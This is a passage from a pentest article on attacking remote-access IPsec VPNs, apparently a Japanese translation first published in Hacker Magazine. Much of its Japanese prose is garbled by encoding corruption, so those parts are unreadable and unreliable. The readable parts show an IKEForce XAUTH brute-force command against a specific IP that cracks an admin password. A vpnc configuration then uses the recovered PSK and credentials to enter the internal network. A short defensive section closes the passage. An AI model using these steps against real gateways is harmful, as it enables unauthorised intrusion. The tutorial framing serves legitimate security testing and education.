XAUTHã¯è¿œå ã®ä¿è·ã§ããã2çªç®ã®èªèšŒèŠçŽ ã§ããããã§ãŒãº1.5ã«ããããšãæãåºãããŠãã ããã XAUTHã«ã¯ããã€ãã®ãªãã·ã§ã³ããããŸã-ããã¯RADIUSæ€èšŒãã¯ã³ã¿ã€ã ãã¹ã¯ãŒãïŒOTPïŒãããã³éåžžã®ããŒã«ã«ãŠãŒã¶ãŒããŒã¿ããŒã¹ã§ãã ããŒã«ã«ãŠãŒã¶ãŒããŒã¿ããŒã¹ã䜿çšããŠ2çªç®ã®èŠå ã確èªããå Žåã®æšæºçãªç¶æ³ã«çŠç¹ãåœãŠãŸãã æè¿ãŸã§ãXAUTHãã«ãŒããã©ãŒã¹çšã®ãããªãã¯ã¢ã¯ã»ã¹ããŒã«ã¯ãããŸããã§ããã ããããIKEForceã®åºçŸã«ããããã®ã¿ã¹ã¯ã¯äŸ¡å€ãããœãªã¥ãŒã·ã§ã³ãåãåããŸããã XAUTH bruteforceã®å®è¡ã¯éåžžã«ç°¡åã§ãã
python ikeforce.py 37.59.0.253 -b -i vpn -k cisco123 -u admin -w wordlists/passwd.txt -t 5 2 1 2 [+]Program started in XAUTH Brute Force Mode [+]Single user provided - brute forcing passwords for user: admin [*]XAUTH Authentication Successful! Username: admin Password: cisco
å³ 9. IKEForce XAUTH
åæã«ã以åã«èŠã€ãã£ããã¹ãŠã®å€ã瀺ãããŸãïŒIDïŒããŒã-iãïŒã埩å ãããPSKïŒããŒã-kãïŒãããã³æå³ãããã°ã€ã³ïŒããŒã-uãïŒã IKEForceã¯ããã«ãŒããã©ãŒã¹ãã°ã€ã³ãšãã°ã€ã³ãªã¹ãã®æ€çŽ¢ã®äž¡æ¹ããµããŒãããŠããŸããããã¯ã `-U`ãã©ã¡ãŒã¿ãŒã§æå®ã§ããŸãã éžæããã¯ãçºçããå¯èœæ§ãããå Žåããªãã·ã§ã³ã-sããããããã«ãŒããã©ãŒã¹ã®é床ãäœäžãããããšãã§ããŸãã ã¡ãªã¿ã«ããŠãŒãã£ãªãã£ã«ã¯ããã€ãã®åªããèŸæžãä»å±ããŠãããç¹ã«IDãã©ã¡ãŒã¿ã®å€ãèšå®ããã®ã«åœ¹ç«ã¡ãŸãã
å éšãããã¯ãŒã¯ã«å ¥ããŸã
ãã¹ãŠã®ããŒã¿ãæã£ãã®ã§ãæåŸã®ã¹ããããã€ãŸãããŒã«ã«ãããã¯ãŒã¯èªäœãžã®äŸµå ¥ãæ®ããŸãã ãã®ããã«ã¯ãããçš®ã®VPNã¯ã©ã€ã¢ã³ããå¿ èŠã§ããããã®äžã«ã¯éåžžã«å€ãã®ãã®ããããŸãã ããããKaliã®å Žåãäºåã«ã€ã³ã¹ããŒã«ãããVPNCãç°¡åã«äœ¿çšã§ããŸãã ãããæ©èœããããã«ã¯ã1ã€ã®èšå®ãã¡ã€ã«ã調æŽããå¿ èŠããããŸã-`/ etc / vpnc / vpn.conf`ã ããã§ãªãå Žåã¯ãããã€ãã®æãããªãã©ã¡ãŒã¿ãŒãäœæããŠå ¥åããå¿ èŠããããŸãã
IPSecã²ãŒããŠã§ã€37.59.0.253
IPSec ID VPN
IPSecã·ãŒã¯ã¬ããcisco123
IKE Authmode psk
XauthãŠãŒã¶ãŒåadmin
Xauthãã¹ã¯ãŒãcisco
ããã§ã¯ãåã®æé ã§èŠã€ãã£ããã¹ãŠã®ããŒã¿ïŒ2çªç®ã®èŠçŽ ã®IDãPSKå€ããŠãŒã¶ãŒåããã¹ã¯ãŒãïŒã䜿çšãããããšãããããŸãã ãã®åŸã1ã€ã®ã³ãã³ãã§æ¥ç¶èªäœãçºçããŸãã
root@kali:~# vpnc vpn
ç¡å¹åãéåžžã«ç°¡åã§ãã
root@kali:~# vpnc-disconnect
æ¥ç¶ã¯ã `ifconfig tun0`ã³ãã³ãã䜿çšããŠç¢ºèªã§ããŸãã
å³ 10. VPNC
ä¿¡é Œã§ããä¿è·ãæ§ç¯ããæ¹æ³
çŸåšèããããŠããæ»æã«å¯Ÿããä¿è·ã¯å æ¬çã§ããå¿ èŠããããŸããããããé©æã«ã€ã³ã¹ããŒã«ããæ°žç¶çãªäºåå ±æããŒã䜿çšããå¿ èŠããããŸãã ãã¹ã¯ãŒãããªã·ãŒããã³ãã®ä»ã®æ å ±ã»ãã¥ãªãã£ã®æãããªèŠçŽ ããã»ãã¥ãªãã£ã®ç¢ºä¿ã«éèŠãªåœ¹å²ãæãããŸãã ç¶æ³ã¯åŸã ã«å€åããŠãããæéã®çµéãšãšãã«IKEv2ã®ã¿ãæ®ãããšã«æ³šæããŠãã ããã
çµæã¯äœã§ãã
RA IPsec VPNã®ç£æ»ããã»ã¹ã詳现ã«èª¿æ»ããŸããã ã¯ãããã¡ããããã®ã¿ã¹ã¯ã¯ç°¡åã§ã¯ãããŸããã åãã¹ãå€ãã®ã¹ããããããããããã®ããããã«å°é£ãäºæ³ãããŸãããæåããå Žåãçµæã¯å°è±¡çã§ãã å éšãããã¯ãŒã¯ãªãœãŒã¹ãžã®ã¢ã¯ã»ã¹ãååŸãããšãããã«ã¢ã¯ã·ã§ã³ãå®è¡ã§ããç¯å²ãåºãããŸãã ãããã£ãŠããããã¯ãŒã¯å¢çã®ä¿è·ãæ åœãããŠãŒã¶ãŒã¯ãæ¢æã®ããã©ã«ããã³ãã¬ãŒãã«äŸåããå¿ èŠã¯ãããŸããããã»ãã¥ãªãã£ã®åã¬ã€ã€ãŒãæ éã«æ€èšããŠãã ããã ããŠããã³ãã¹ããå®æœãã人ã«ãšã£ãŠãçºèŠããã500çªç®ã®UDPããŒãã¯ãIPsec VPNã»ãã¥ãªãã£ã®è©³çŽ°ãªåæãå®æœãããããããè¯ãçµæãåŸãæ©äŒã§ãã
Hacker MagazineïŒ196ã§æåã«çºè¡ãããŸããã
æçš¿è ïŒAlexander DmitrenkoãPENTESTIT
ããã«ãŒã賌èªãã